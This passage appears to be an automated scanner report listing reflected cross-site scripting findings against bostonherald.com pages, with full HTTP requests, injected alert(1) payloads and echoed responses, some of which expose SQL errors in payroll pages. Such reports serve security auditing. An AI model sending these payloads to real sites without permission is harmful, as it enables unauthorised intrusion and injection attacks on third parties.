2.25. http://www.bostonherald.com/mediacenter/video.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aa21</script><script>alert(1)</script>b29dc7874f2 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2759
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script>
...[SNIP]...

2.26. http://www.bostonherald.com/mediacenter/video.php [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51c2</script><script>alert(1)</script>07de356f883 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalkb51c2</script><script>alert(1)</script>07de356f883 snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:02:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
p://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Sidewalkb51c2</script><script>alert(1)</script>07de356f883");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageURL","
...[SNIP]...

2.27. http://www.bostonherald.com/mediacenter/video.php [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e143d"><script>alert(1)</script>a9e85fd0010 was submitted in the width parameter. This input was echoed as e143d\"><script>alert(1)</script>a9e85fd0010 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370e143d"><script>alert(1)</script>a9e85fd0010&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2533
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="adCompanionSubstitute" class="w370e143d\"><script>alert(1)</script>a9e85fd0010xh300">
...[SNIP]...

2.28. http://www.bostonherald.com/news/politics/view.bg [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff39a'-alert(1)-'96f43005832 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/politics/view.bg?articleid=1312665&format=emailff39a'-alert(1)-'96f43005832 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312665&format=emailff39a'-alert(1)-'96f43005832'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

2.29. http://www.bostonherald.com/news/regional/view.bg [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The value of the format request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf1d'-alert(1)-'71a4876b0f9 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/regional/view.bg?articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<script type="text/javascript">

       // Converts the GET params to a JSON object
       GET_Params = 'articleid=1312541&format=emailbdf1d'-alert(1)-'71a4876b0f9'.toQueryParams();
       
       //alert(Object.inspect(GET_Params));
       //-----------------------------------------------------------------
       function updatePage(key,val) {
       //----------------------------
...[SNIP]...

2.30. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c00b'-alert(1)-'f86646641f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/cambridge/?5c00b'-alert(1)-'f86646641f6=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 529
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?5c00b'-alert(1)-'f86646641f6=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.31. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4bca(a)57e0d5026f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/cambridge/?f4bca(a)57e0d5026f9=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 502
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?f4bca(a)57e0d5026f9=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4bca(a)57e0d5026f9=1 LIMIT 0,20' at line
...[SNIP]...

2.32. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c260f(a)d58a654d6ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/mass_pike/?c260f(a)d58a654d6ed=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 370
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?c260f(a)d58a654d6ed=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?c260f(a)d58a654d6ed=1 LIMIT 0,20' at line
...[SNIP]...

2.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f0b5'-alert(1)-'a16c453c05d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/mass_pike/?4f0b5'-alert(1)-'a16c453c05d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 397
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?4f0b5'-alert(1)-'a16c453c05d=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6c960(a)77d7148e6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quasi_state/?6c960(a)77d7148e6d8=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 540
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?6c960(a)77d7148e6d8=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?6c960(a)77d7148e6d8=1 LIMIT 0,20' at line
...[SNIP]...

2.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb58b(a)bc791e733d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /projects/payroll/quincy/?eb58b(a)bc791e733d=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 365
